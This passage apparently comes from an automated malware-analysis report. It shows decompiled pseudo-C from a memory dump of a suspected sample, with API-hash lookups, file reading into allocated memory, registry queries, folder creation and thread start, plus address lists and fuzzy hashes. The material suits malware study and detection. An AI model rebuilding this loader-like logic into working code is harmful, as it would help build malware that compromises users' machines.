                                                                  • Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1
                                                                  • Part of subcall function 000D8290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000D82E8
                                                                • GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?), ref: 000E867A
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: InformationToken$AllocateCloseHandleHeapLibraryLoad
                                                                • String ID:
                                                                • API String ID: 3980138298-0
                                                                • Opcode ID: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
                                                                • Instruction ID: ca40b63884ed15a028f51ce09c71cf889a1d365e6c30daf37b8ecf025ef93db2
                                                                • Opcode Fuzzy Hash: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
                                                                • Instruction Fuzzy Hash: 3631B2A5E403457BEA2136B0AC03FBE36599F11759F0A0131FD1CBA3D7FA51AA1486B3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 66%
                                                                			E000DA5E0(WCHAR* _a4, void** _a8, void* _a12) {
                                                                				void* _v12;
                                                                				char _v20;
                                                                				intOrPtr _v24;
                                                                				void* _v28;
                                                                				long _v32;
                                                                				void* _t21;
                                                                				void* _t22;
                                                                				intOrPtr* _t24;
                                                                				intOrPtr* _t26;
                                                                				void* _t28;
                                                                				void* _t30;
                                                                				int _t32;
                                                                				intOrPtr* _t33;
                                                                				void** _t42;
                                                                				signed int _t43;
                                                                				void* _t46;
                                                                				void* _t49;
                                                                				void* _t51;
                                                                				void* _t52;
                                                                
                                                                				_t42 = _a8;
                                                                				E000DBF50(_t52, 0, 0xad68947);
                                                                				_t46 = (_t43 & 0xfffffff8) - 0x10 + 8;
                                                                				_t40 =  ==  ? 1 : 7;
                                                                				_t21 = CreateFileW(_a4, 0x80000000,  ==  ? 1 : 7, 0, 3, 0, 0); // executed
                                                                				_t54 = _t21 - 0xffffffff;
                                                                				_t42[2] = _t21;
                                                                				if(_t21 == 0xffffffff) {
                                                                					L4:
                                                                					_t22 = 0;
                                                                				} else {
                                                                					_t24 = E000DBF50(_t54, 0, E000D9D50(0x651fdb24));
                                                                					_t49 = _t46 + 0xc;
                                                                					_push( &_v20);
                                                                					_push(_t42[2]);
                                                                					if( *_t24() == 0) {
                                                                						L3:
                                                                						_t26 = E000DBF50(_t56, 0, 0xb8e7db5);
                                                                						 *_t26(_t42[2]);
                                                                						goto L4;
                                                                					} else {
                                                                						_t56 = _v24;
                                                                						if(_v24 == 0) {
                                                                							_t28 = _v28;
                                                                							__eflags = _t28;
                                                                							_t42[1] = _t28;
                                                                							if(__eflags == 0) {
                                                                								 *_t42 = 0;
                                                                								_t22 = 1;
                                                                							} else {
                                                                								E000DBF50(__eflags, 0, 0x1f8cae3);
                                                                								_t49 = _t49 + 8;
                                                                								_t30 = VirtualAlloc(0, _t42[1], 0x3000, 4); // executed
                                                                								__eflags = _t30;
                                                                								 *_t42 = _t30;
                                                                								if(__eflags == 0) {
                                                                									goto L3;
                                                                								} else {
                                                                									E000DBF50(__eflags, 0, 0xb7ac9a5);
                                                                									_t51 = _t49 + 8;
                                                                									_t32 = ReadFile(_t42[2],  *_t42, _t42[1],  &_v32, 0); // executed
                                                                									__eflags = _t32;
                                                                									if(__eflags == 0) {
                                                                										L12:
                                                                										_t33 = E000DBF50(__eflags, 0, 0xb1fd105);
                                                                										_t49 = _t51 + 8;
                                                                										 *_t33( *_t42, 0, 0x8000);
                                                                										goto L3;
                                                                									} else {
                                                                										__eflags = _v32 - _t42[1];
                                                                										if(__eflags != 0) {
                                                                											goto L12;
                                                                										} else {
                                                                											_t22 = 1;
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                						} else {
                                                                							goto L3;
                                                                						}
                                                                					}
                                                                				}
                                                                				return _t22;
                                                                			}






















                                                                0x000da5eb
                                                                0x000da5f8
                                                                0x000da5fd
                                                                0x000da60e
                                                                0x000da620
                                                                0x000da622
                                                                0x000da625
                                                                0x000da628
                                                                0x000da66b
                                                                0x000da66b
                                                                0x000da62a
                                                                0x000da63a
                                                                0x000da63f
                                                                0x000da646
                                                                0x000da647
                                                                0x000da64e
                                                                0x000da657
                                                                0x000da65e
                                                                0x000da669
                                                                0x00000000
                                                                0x000da650
                                                                0x000da650
                                                                0x000da655
                                                                0x000da674
                                                                0x000da678
                                                                0x000da67a
                                                                0x000da67d
                                                                0x000da6d3
                                                                0x000da6d9
                                                                0x000da67f
                                                                0x000da686
                                                                0x000da68b
                                                                0x000da69a
                                                                0x000da69c
                                                                0x000da69e
                                                                0x000da6a0
                                                                0x00000000
                                                                0x000da6a2
                                                                0x000da6a9
                                                                0x000da6ae
                                                                0x000da6c0
                                                                0x000da6c2
                                                                0x000da6c4
                                                                0x000da6dd
                                                                0x000da6e4
                                                                0x000da6e9
                                                                0x000da6f5
                                                                0x00000000
                                                                0x000da6c6
                                                                0x000da6ca
                                                                0x000da6cd
                                                                0x00000000
                                                                0x000da6cf
                                                                0x000da6cf
                                                                0x000da6cf
                                                                0x000da6cd
                                                                0x000da6c4
                                                                0x000da6a0
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000da655
                                                                0x000da64e
                                                                0x000da673

                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000DA620
                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 000DA69A
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 000DA6C0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: File$AllocCreateReadVirtual
                                                                • String ID:
                                                                • API String ID: 3585551309-0
                                                                • Opcode ID: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
                                                                • Instruction ID: 0e10fff0da0687721ab9e0abfb18a61e37a2958cc7af6f14ade5649007afceee
                                                                • Opcode Fuzzy Hash: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
                                                                • Instruction Fuzzy Hash: DC31F571744301FBEB216B60DC03F9A76D0DB41B11F18482EFAAD962D1E7B1F5109A72
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 90%
                                                                			E000DABF0(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
                                                                				void* _t11;
                                                                				signed char _t12;
                                                                				long _t14;
                                                                				signed int _t29;
                                                                				void* _t38;
                                                                
                                                                				_t12 = E000E5000(_t11, _t38, 0xffffffff);
                                                                				E000DBF50(_t38, 9, 0xda29a27);
                                                                				_t14 = RegOpenKeyExW(_a4, _a8, 0, (_t12 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
                                                                				_t29 = 0xffffffff;
                                                                				_t39 = _t14;
                                                                				if(_t14 == 0) {
                                                                					E000DBF50(_t39, 9, 0x8097c7);
                                                                					RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24); // executed
                                                                					asm("sbb esi, esi");
                                                                					_t29 =  !0x00000000 | _a24;
                                                                					E000DBF50( !0x00000000, 9, 0x3111c69);
                                                                					RegCloseKey(_a4); // executed
                                                                				}
                                                                				return _t29;
                                                                			}








                                                                0x000dabfe
                                                                0x000dac16
                                                                0x000dac27
                                                                0x000dac29
                                                                0x000dac2e
                                                                0x000dac30
                                                                0x000dac42
                                                                0x000dac56
                                                                0x000dac5d
                                                                0x000dac61
                                                                0x000dac6b
                                                                0x000dac76
                                                                0x000dac76
                                                                0x000dac7e

                                                                APIs
                                                                • RegOpenKeyExW.KERNEL32(00000000,?,00000000,?,?), ref: 000DAC27
                                                                • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?), ref: 000DAC56
                                                                  • Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1
                                                                • RegCloseKey.KERNEL32(?,?,?,?,?), ref: 000DAC76
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: CloseLibraryLoadOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3751545530-0
                                                                • Opcode ID: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
                                                                • Instruction ID: d8317b7a5d010822de5474c9524c4bb6d209ba1ea9108223fde1c64ef4f493ea
                                                                • Opcode Fuzzy Hash: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
                                                                • Instruction Fuzzy Hash: B101D277A402287FDB109E94DC82FDB3758DB49B65F050224FE28A72C2E661BE1187F1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 94%
                                                                			E000E4680(void* __eflags, intOrPtr _a4, char _a8) {
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				intOrPtr _v36;
                                                                				intOrPtr _v40;
                                                                				char _v52;
                                                                				char _v64;
                                                                				intOrPtr _v72;
                                                                				char _v76;
                                                                				char _v88;
                                                                				char _v100;
                                                                				char _v112;
                                                                				char _v124;
                                                                				char _v136;
                                                                				char _v148;
                                                                				char _v160;
                                                                				char _v172;
                                                                				char _v184;
                                                                				char _v196;
                                                                				char _v208;
                                                                				char _v220;
                                                                				char _v232;
                                                                				char _v248;
                                                                				char _v266;
                                                                				char _v306;
                                                                				char _v528;
                                                                				char _v1048;
                                                                				void* _t171;
                                                                				void* _t173;
                                                                				void* _t175;
                                                                				intOrPtr* _t177;
                                                                				void* _t178;
                                                                				intOrPtr _t179;
                                                                				signed int _t229;
                                                                				signed int _t233;
                                                                				void* _t236;
                                                                				void* _t238;
                                                                				void* _t244;
                                                                				void* _t252;
                                                                				signed int _t254;
                                                                				void* _t263;
                                                                				void* _t269;
                                                                				void* _t276;
                                                                				intOrPtr _t279;
                                                                				signed int _t287;
                                                                				void* _t288;
                                                                				void* _t290;
                                                                				void* _t293;
                                                                				signed char _t299;
                                                                				void* _t314;
                                                                				signed int _t319;
                                                                				void* _t321;
                                                                				signed int _t323;
                                                                				signed int _t325;
                                                                				WCHAR* _t327;
                                                                				signed int _t329;
                                                                				void* _t339;
                                                                				signed int _t341;
                                                                				void* _t342;
                                                                				void* _t343;
                                                                				signed int _t350;
                                                                				signed int _t353;
                                                                				intOrPtr _t368;
                                                                				intOrPtr _t404;
                                                                				signed int _t487;
                                                                				intOrPtr _t488;
                                                                				signed int _t489;
                                                                				intOrPtr _t490;
                                                                				signed int _t499;
                                                                				intOrPtr _t512;
                                                                				signed int _t513;
                                                                				void* _t530;
                                                                				void* _t531;
                                                                				void* _t535;
                                                                				void* _t593;
                                                                				void* _t604;
                                                                				void* _t606;
                                                                				void* _t609;
                                                                
                                                                				_t171 = E000E7EE0(__eflags, 0xa20123ac, 1, 0xffffffff); // executed
                                                                				_t531 = _t530 + 0xc;
                                                                				_t611 = _t171;
                                                                				if(_t171 == 0) {
                                                                					L2:
                                                                					_t350 = 0;
                                                                				} else {
                                                                					_t173 = E000E9AC0(_t611, 0xffffffff); // executed
                                                                					_t473 =  ==  ? 0x8026 : 0x801a;
                                                                					_t175 = E000D9D50(0x647400a4);
                                                                					_t177 = E000DBF50(_t173 - 4, _t175, E000D9D50(0x644e562b));
                                                                					_t535 = _t531 + 0x14;
                                                                					_t351 =  &_v1048;
                                                                					_t178 =  *_t177(0,  ==  ? 0x8026 : 0x801a, 0, 0,  &_v1048); // executed
                                                                					if(_t178 == 0) {
                                                                						_t179 = E000D8290(0x3d0);
                                                                						_t510 = _t179;
                                                                						E000E1E90(__eflags, _t179 + 0xc); // executed
                                                                						_t2 = _t510 + 0x1c; // 0x1c, executed
                                                                						E000E3BC0(_t2, __eflags);
                                                                						_t3 = _t510 + 0xe6; // 0xe6
                                                                						E000D5CD0(__eflags, 2, _t3, 4, 8);
                                                                						_t4 = _t510 + 0xf8; // 0xf8
                                                                						E000DA980(_t4); // executed
                                                                						E000EF740( &_v64);
                                                                						__eflags = _a8;
                                                                						_t375 =  !=  ? 0xf0bf2 : 0xf051c;
                                                                						E000E5180( &_v1048,  &_v64, E000D7200( !=  ? 0xf0bf2 : 0xf051c,  &_v528), 0); // executed
                                                                						E000EF740( &_v232);
                                                                						E000E5180( &_v1048,  &_v232, 0, 0); // executed
                                                                						E000EF740( &_v220);
                                                                						E000E5180( &_v1048,  &_v220, 0, 0); // executed
                                                                						E000EF740( &_v208);
                                                                						E000E5180( &_v1048,  &_v208, 0, 0); // executed
                                                                						E000EF740( &_v196);
                                                                						E000E5180(_t351,  &_v196, 0, 0); // executed
                                                                						E000EF740( &_v184);
                                                                						E000E5180(_t351,  &_v184, 0, 1); // executed
                                                                						E000EF740( &_v172);
                                                                						E000E5180(_t351,  &_v172, 0, 1); // executed
                                                                						E000EF740( &_v160);
                                                                						E000E5180(_t351,  &_v160, 0, 0); // executed
                                                                						E000EF740( &_v148);
                                                                						E000E5180(_t351,  &_v148, 0, 0); // executed
                                                                						E000EF740( &_v136);
                                                                						E000E5180(_t351,  &_v136, 0, 0); // executed
                                                                						E000EF740( &_v124);
                                                                						E000E5180(_t351,  &_v124, 0, 0); // executed
                                                                						E000EF740( &_v112);
                                                                						E000E5180(_t351,  &_v112, 0, 0); // executed
                                                                						E000EF740( &_v100);
                                                                						E000E5180(_t351,  &_v100, 0, 0); // executed
                                                                						_t487 =  &_v88;
                                                                						E000EF740(_t487);
                                                                						_t470 = _t487;
                                                                						E000E5180(_t351, _t487, 0, 0); // executed
                                                                						E000D21E0(2, 0x80000001, E000D7200(0xf09d0,  &_v306),  &_v266, 4, 8); // executed
                                                                						_t404 = _t179;
                                                                						_t23 = _t404 + 0x3be; // 0x3be
                                                                						_t488 = _t404;
                                                                						_v24 = _t404;
                                                                						E000DD4F0(_t487, 0, _t23, 4, 8);
                                                                						_t25 = _t488 + 0x3c7; // 0x3c7
                                                                						E000DD4F0(_t487, 0, _t25, 4, 8);
                                                                						_t489 = E000D22E0(__eflags, E000DBA30(__eflags, _t351), 0xffffffff);
                                                                						_t229 = E000DEC30(E000EFCF0( &_v64) + _t489 * 2, 0xffffffff, _t179 + 0x1fe, 0x20);
                                                                						_t512 = _v24;
                                                                						__eflags = _t229;
                                                                						_t353 = 0 | _t229 == 0x00000000;
                                                                						_v20 = _t512 + 0x25e;
                                                                						_t233 = E000DEC30(E000EFCF0( &_v232) + _t489 * 2, 0xffffffff, _v20, 0x20);
                                                                						_t38 = _t353 + 1; // 0x1
                                                                						__eflags = _t233;
                                                                						_t513 = _t512 + 0x27e;
                                                                						_t408 =  !=  ? _t353 : _t38;
                                                                						_v20 =  !=  ? _t353 : _t38;
                                                                						_t236 = E000DEC30(E000EFCF0( &_v220) + _t489 * 2, 0xffffffff, _t513, 0x20);
                                                                						_t490 = _v24;
                                                                						__eflags = _t236 - 1;
                                                                						asm("sbb esi, esi");
                                                                						_v28 = _t490 + 0x29e;
                                                                						_t238 = E000EFCF0( &_v208);
                                                                						_v32 = _t489;
                                                                						__eflags = E000DEC30(_t238 + _t489 * 2, 0xffffffff, _v28, 0x20) - 1;
                                                                						asm("sbb esi, [ebp-0x10]");
                                                                						_v28 =  ~_t513;
                                                                						_v20 = _t490 + 0x2be;
                                                                						_t244 = E000EFCF0( &_v196);
                                                                						__eflags = E000DEC30(_t244 + _t489 * 2, 0xffffffff, _v20, E000D9D50(0x6474008c));
                                                                						_t356 = 0 | __eflags == 0x00000000;
                                                                						_v20 = E000D1460(__eflags, _t513,  ~(__eflags == 0));
                                                                						E000D1460(__eflags, _v28, _t356);
                                                                						_t252 = E000EFCF0( &_v184);
                                                                						_t254 = E000DEC30(_t252 + _v32 * 2, 0xffffffff, _v24 + 0x21e, E000D9D50(0x6474008c));
                                                                						__eflags = _t254;
                                                                						_v28 = E000D9D50(0x59d06af4);
                                                                						_v36 = _v24 + 0x23e;
                                                                						_v36 = E000DEC30(E000EFCF0( &_v172) + _v32 * 2, 0xffffffff, _v36, 0x20);
                                                                						_v40 = E000D9D50(0xe4894f31);
                                                                						_t263 = E000DEC30(E000EFCF0( &_v160) + _v32 * 2, 0xffffffff, _v24 + 0x2de, 0x20);
                                                                						__eflags = _v36 - 1;
                                                                						asm("adc ebx, 0x0");
                                                                						__eflags = _t263 - 1;
                                                                						asm("adc ebx, 0x0");
                                                                						__eflags = E000DEC30(E000EFCF0( &_v148) + _v32 * 2, 0xffffffff, _v24 + 0x2fe, 0x20);
                                                                						_t419 = 0 | __eflags == 0x00000000;
                                                                						_v20 = (_t254 == 0) - _v28 + _v20 + _v40 - 0x4358e545;
                                                                						_t269 = E000D1460(__eflags, (_t254 == 0) - _v28 + _v20 + _v40 + 0xddcba449, __eflags == 0);
                                                                						E000D1460(__eflags, _v20, _t419);
                                                                						_v20 = _v24 + 0x31e;
                                                                						__eflags = E000DEC30(E000EFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20);
                                                                						_v20 = E000D1460(E000DEC30(E000EFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20), _t269 + 0xdedb7672, 0 | E000DEC30(E000EFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20) == 0x00000000);
                                                                						_t276 = E000EFCF0( &_v124);
                                                                						__eflags = E000DEC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E000D9D50(0x6474008c));
                                                                						_t279 = E000D1460(E000DEC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E000D9D50(0x6474008c)), _v20, 0 | E000DEC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E000D9D50(0x6474008c)) == 0x00000000);
                                                                						_v20 = _v24 + 0x35e;
                                                                						__eflags = E000DEC30(E000EFCF0( &_v112) + _v32 * 2, 0xffffffff, _v20, 0x20) - 1;
                                                                						asm("adc esi, 0x0");
                                                                						_v20 = _t279;
                                                                						_t287 = E000D55C0(E000DEC30(E000EFCF0( &_v100) + _v32 * 2, 0xffffffff, _v24 + 0x37e, 0x10), 0);
                                                                						_t288 = E000D9D50(0x1eac204e);
                                                                						_t290 = E000D1460(__eflags, _v20 - _t288 + (_t287 & 0x00000001), E000D9D50(0x1eac204e));
                                                                						E000D1460(__eflags, _v20, _t287 & 0x00000001);
                                                                						_t368 = _v24;
                                                                						_v20 = _t368 + 0x38e;
                                                                						_t293 = E000EFCF0( &_v88);
                                                                						__eflags = E000DEC30(_t293 + _v32 * 2, 0xffffffff, _v20, E000D9D50(0x647400bc)) - 1;
                                                                						asm("adc esi, 0x0");
                                                                						__eflags = E000DEC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1;
                                                                						asm("adc esi, 0x0");
                                                                						_t299 = E000D6BB0(E000DEC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1, _t290, 0);
                                                                						_t593 = _t535 + 0x240;
                                                                						__eflags = _t299 & 0x00000001;
                                                                						if((_t299 & 0x00000001) != 0) {
                                                                							L14:
                                                                							_t350 = 0;
                                                                							__eflags = 0;
                                                                						} else {
                                                                							_t314 = E000D9D50(0x647410ac);
                                                                							_t499 = E000DD620(_t314, E000D9D50(0x6474ff53));
                                                                							_t319 = E000D20A0(__eflags, _t499,  !(E000D9D50(0x6474ff53)));
                                                                							E000D9D50(0x6474ff53);
                                                                							_t321 = E000D9D50(0x647410ac);
                                                                							_t323 = E000DD620(_t321, E000D9D50(0x6474ff53));
                                                                							 *(_t368 + 0x1fa) = _t323 << E000D9D50(0x647400bc) | _t319 & _t499;
                                                                							_t325 = E000DD030(_t324, __eflags, _t368); // executed
                                                                							_t604 = _t593 + 0x38;
                                                                							__eflags = _t325;
                                                                							if(_t325 == 0) {
                                                                								goto L14;
                                                                							} else {
                                                                								_t529 = _a4;
                                                                								E000EEDD0( &_v52);
                                                                								_t327 = E000EFCF0(_a4);
                                                                								_t329 = E000DA5E0(_t327,  &_v76, E000D9D50(0x647400ae)); // executed
                                                                								_t606 = _t604 + 0x10;
                                                                								__eflags = _t329;
                                                                								if(_t329 != 0) {
                                                                									_t470 = _v72 + _v76;
                                                                									__eflags = _v72 + _v76;
                                                                									E000EF410(_v76,  &_v52, _v76, _v72 + _v76); // executed
                                                                									E000E9C40(__eflags,  &_v76); // executed
                                                                									_t606 = _t606 + 4;
                                                                								}
                                                                								_t447 =  &_v52;
                                                                								__eflags = E000EF190( &_v52);
                                                                								if(__eflags != 0) {
                                                                									_t339 = E000EF190( &_v52);
                                                                									_t341 = E000ECB00(__eflags,  &_v248, E000EEE10( &_v52), _t339); // executed
                                                                									_t609 = _t606 + 0xc;
                                                                									__eflags = _t341;
                                                                									if(__eflags != 0) {
                                                                										E000DECC0(_t341,  &_v248, _t470, __eflags); // executed
                                                                									}
                                                                									_t342 = E000EF190( &_v52);
                                                                									_t343 = E000EEE10( &_v52);
                                                                									_t447 =  &_v64;
                                                                									E000E9600(E000EFCF0( &_v64), __eflags, _t344, _t343, _t342); // executed
                                                                									_t606 = _t609 + 0xc; // executed
                                                                								}
                                                                								E000E04C0(_t447, _t470, __eflags); // executed
                                                                								E000E5040(_t447, _t470, __eflags); // executed
                                                                								__eflags = E000E6700(__eflags);
                                                                								if(__eflags != 0) {
                                                                									E000DBF50(__eflags, 0, 0xa0733d4);
                                                                									CreateThread(0, 0, E000E5420, E000E7640(E000EFCF0(_t529), 0xffffffff), 0, 0); // executed
                                                                								}
                                                                								E000EFB40( &_v52); // executed
                                                                								_t350 = 1;
                                                                							}
                                                                						}
                                                                						E000EFB20( &_v88);
                                                                						E000EFB20( &_v100);
                                                                						E000EFB20( &_v112);
                                                                						E000EFB20( &_v124);
                                                                						E000EFB20( &_v136);
                                                                						E000EFB20( &_v148);
                                                                						E000EFB20( &_v160);
                                                                						E000EFB20( &_v172);
                                                                						E000EFB20( &_v184);
                                                                						E000EFB20( &_v196);
                                                                						E000EFB20( &_v208);
                                                                						E000EFB20( &_v220);
                                                                						E000EFB20( &_v232);
                                                                						E000EFB20( &_v64);
                                                                					} else {
                                                                						goto L2;
                                                                					}
                                                                				}
                                                                				return _t350;
                                                                			}


















































































                                                                0x000e4695
                                                                0x000e469a
                                                                0x000e469d
                                                                0x000e469f
                                                                0x000e46f4
                                                                0x000e46f4
                                                                0x000e46a1
                                                                0x000e46a3
                                                                0x000e46b7
                                                                0x000e46bf
                                                                0x000e46d8
                                                                0x000e46dd
                                                                0x000e46e0
                                                                0x000e46ee
                                                                0x000e46f2
                                                                0x000e4700
                                                                0x000e4708
                                                                0x000e470e
                                                                0x000e4716
                                                                0x000e4719
                                                                0x000e471e
                                                                0x000e472b
                                                                0x000e4733
                                                                0x000e473a
                                                                0x000e4747
                                                                0x000e474c
                                                                0x000e475a
                                                                0x000e4774
                                                                0x000e4784
                                                                0x000e4791
                                                                0x000e47a1
                                                                0x000e47ae
                                                                0x000e47be
                                                                0x000e47cb
                                                                0x000e47db
                                                                0x000e47e8
                                                                0x000e47f8
                                                                0x000e4805
                                                                0x000e4815
                                                                0x000e4822
                                                                0x000e4832
                                                                0x000e483f
                                                                0x000e484f
                                                                0x000e485c
                                                                0x000e486c
                                                                0x000e4879
                                                                0x000e4886
                                                                0x000e4893
                                                                0x000e48a0
                                                                0x000e48ad
                                                                0x000e48ba
                                                                0x000e48c7
                                                                0x000e48cf
                                                                0x000e48d4
                                                                0x000e48db
                                                                0x000e48e1
                                                                0x000e4910
                                                                0x000e4918
                                                                0x000e4920
                                                                0x000e4926
                                                                0x000e4928
                                                                0x000e4932
                                                                0x000e493a
                                                                0x000e4947
                                                                0x000e4966
                                                                0x000e4976
                                                                0x000e497e
                                                                0x000e4983
                                                                0x000e498b
                                                                0x000e4994
                                                                0x000e49a7
                                                                0x000e49af
                                                                0x000e49b2
                                                                0x000e49b4
                                                                0x000e49ba
                                                                0x000e49bd
                                                                0x000e49d6
                                                                0x000e49de
                                                                0x000e49e1
                                                                0x000e49ea
                                                                0x000e49f2
                                                                0x000e49f5
                                                                0x000e49fd
                                                                0x000e4a10
                                                                0x000e4a19
                                                                0x000e4a20
                                                                0x000e4a29
                                                                0x000e4a2c
                                                                0x000e4a52
                                                                0x000e4a54
                                                                0x000e4a65
                                                                0x000e4a6c
                                                                0x000e4a83
                                                                0x000e4aa0
                                                                0x000e4aaa
                                                                0x000e4abf
                                                                0x000e4ace
                                                                0x000e4ae9
                                                                0x000e4aff
                                                                0x000e4b19
                                                                0x000e4b32
                                                                0x000e4b36
                                                                0x000e4b39
                                                                0x000e4b3f
                                                                0x000e4b60
                                                                0x000e4b68
                                                                0x000e4b71
                                                                0x000e4b78
                                                                0x000e4b8c
                                                                0x000e4ba3
                                                                0x000e4bc3
                                                                0x000e4bd5
                                                                0x000e4bde
                                                                0x000e4c02
                                                                0x000e4c0b
                                                                0x000e4c21
                                                                0x000e4c3c
                                                                0x000e4c42
                                                                0x000e4c45
                                                                0x000e4c67
                                                                0x000e4c79
                                                                0x000e4c99
                                                                0x000e4ca5
                                                                0x000e4cad
                                                                0x000e4cb9
                                                                0x000e4cbc
                                                                0x000e4ce3
                                                                0x000e4cec
                                                                0x000e4d03
                                                                0x000e4d06
                                                                0x000e4d0c
                                                                0x000e4d11
                                                                0x000e4d14
                                                                0x000e4d16
                                                                0x000e4ec7
                                                                0x000e4ec7
                                                                0x000e4ec7
                                                                0x000e4d1c
                                                                0x000e4d21
                                                                0x000e4d42
                                                                0x000e4d55
                                                                0x000e4d66
                                                                0x000e4d73
                                                                0x000e4d8c
                                                                0x000e4da9
                                                                0x000e4db0
                                                                0x000e4db5
                                                                0x000e4db8
                                                                0x000e4dba
                                                                0x00000000
                                                                0x000e4dc0
                                                                0x000e4dc0
                                                                0x000e4dc6
                                                                0x000e4dcd
                                                                0x000e4de7
                                                                0x000e4dec
                                                                0x000e4def
                                                                0x000e4df1
                                                                0x000e4dfc
                                                                0x000e4dfc
                                                                0x000e4e00
                                                                0x000e4e06
                                                                0x000e4e0b
                                                                0x000e4e0b
                                                                0x000e4e0e
                                                                0x000e4e16
                                                                0x000e4e18
                                                                0x000e4e1f
                                                                0x000e4e36
                                                                0x000e4e3b
                                                                0x000e4e3e
                                                                0x000e4e40
                                                                0x000e4e48
                                                                0x000e4e48
                                                                0x000e4e52
                                                                0x000e4e5b
                                                                0x000e4e60
                                                                0x000e4e6d
                                                                0x000e4e72
                                                                0x000e4e72
                                                                0x000e4e75
                                                                0x000e4e7a
                                                                0x000e4e84
                                                                0x000e4e86
                                                                0x000e4e8f
                                                                0x000e4eb9
                                                                0x000e4eb9
                                                                0x000e4ebe
                                                                0x000e4ec3
                                                                0x000e4ec3
                                                                0x000e4dba
                                                                0x000e4ecc
                                                                0x000e4ed4
                                                                0x000e4edc
                                                                0x000e4ee4
                                                                0x000e4eef
                                                                0x000e4efa
                                                                0x000e4f05
                                                                0x000e4f10
                                                                0x000e4f1b
                                                                0x000e4f26
                                                                0x000e4f31
                                                                0x000e4f3c
                                                                0x000e4f47
                                                                0x000e4f4f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000e46f2
                                                                0x000e4f60

                                                                APIs
                                                                • SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 000E46EE
                                                                  • Part of subcall function 000E5180: CreateDirectoryW.KERNEL32(?,00000000), ref: 000E51F0
                                                                  • Part of subcall function 000D21E0: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 000D2210
                                                                  • Part of subcall function 000DA5E0: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000DA620
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00015420,00000000,00000000,00000000), ref: 000E4EB9
                                                                  • Part of subcall function 000E9C40: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000E9C6F
                                                                  • Part of subcall function 000E9C40: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000E9C89
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: Create$CloseDirectoryFileFolderFreeHandlePathThreadVirtual
                                                                • String ID:
                                                                • API String ID: 1450970588-0
                                                                • Opcode ID: 3226436c37470d4edc31dc6c03184763a27332d9fe39f9c3e15896ac66860f59
                                                                • Instruction ID: c405f27aa02081f44492b7687bedc5d66cd8bd68966cf15a5b4fd4fd763c86b0
                                                                • Opcode Fuzzy Hash: 3226436c37470d4edc31dc6c03184763a27332d9fe39f9c3e15896ac66860f59
                                                                • Instruction Fuzzy Hash: 6F32D672E002596FDB10BBA1DC53FFE726AAB90304F540575F919BB3C3EE706A0586A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 87%
                                                                			E000E3BC0(intOrPtr __ecx, void* __eflags) {
                                                                				char _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				char _v32;
                                                                				char _v52;
                                                                				char _v86;
                                                                				char _v122;
                                                                				char _v158;
                                                                				char _v196;
                                                                				char _v256;
                                                                				short _v456;
                                                                				char _v574;
                                                                				char _v774;
                                                                				int _t23;
                                                                				void* _t25;
                                                                				intOrPtr* _t27;
                                                                				void* _t28;
                                                                				void* _t30;
                                                                				char _t33;
